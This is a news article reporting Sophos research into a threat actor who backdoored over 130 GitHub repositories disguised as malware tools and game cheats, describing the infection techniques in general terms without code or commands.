- I recommend the Pixel 9 to most people looking to upgrade - especially while it's $250 off
- Google's viral research assistant just got its own app - here's how it can help you
- Sony will give you a free 55-inch 4K TV right now - but this is the last day to qualify
- I've used virtually every Linux distro, but this one has a fresh perspective
- The 7 gadgets I never travel without (and why they make such a big difference)
Widespread Campaign Targets Cybercriminals and Gamers
A large-scale operation planting malicious code in open-source projects on GitHub has been uncovered by cybersecurity researchers.
The scheme, centered on a developer using the alias ischhfd83, involves over 130 backdoored repositories disguised as malware tools or game cheats.
A Booby-Trapped Malware Toolkit
The investigation began when a Sophos customer queried the safety of a GitHub-hosted project called Sakura RAT. While the tool itself appeared broken, researchers found it contained a hidden backdoor, targeted not at businesses but at fellow cybercriminals and novice hackers.
The Sakura RAT code included a “PreBuild” event, which silently downloaded additional malware during compilation. This was the first clue in what became a deep investigation into weaponized repositories.
Sophos analysts traced the email address embedded in the malware, uncovering 141 repositories, 133 of which were backdoored impersonating:
Read more on cybercrime networks: 10 Billion Passwords Leaked on Hacking Forum
Automation, Obfuscation and Deception
The threat actor used automation to maintain the illusion of active development. Repositories were filled with thousands of auto-generated commits using GitHub Actions workflows. Most owners had only a few other projects, and contributor accounts followed strict patterns, suggesting a coordinated structure.
Malware was often hosted in GitHub releases or on paste sites, with infection chains hidden in layers of obfuscated code across formats, including PowerShell, Python, JavaScript and Windows screensavers.
While the final payloads varied, they often delivered known threats like Lumma Stealer or AsyncRAT. Researchers believe many of these projects were seeded across forums and social platforms to lure unsuspecting users into compiling and running the backdoored tools.
Implications for Supply Chain Security
Sophos suggests this operation may be tied to a broader Distribution-as-a-Service (DaaS) model previously reported in 2024.
Some code artifacts and infrastructure overlap with past campaigns, but whether the same actor is responsible remains unclear.
Sophos has reported all known active repositories and paste sites to the relevant platforms. Most have since been taken down.
“Ironically, the threat actor seems to predominantly target cheating gamers and inexperienced cybercriminals,” said the research team.
“It’s also worth noting that malware doesn’t usually care who it ends up infecting, and so other groups may also have been infected – including people experimenting with open-source repositories out of curiosity.”
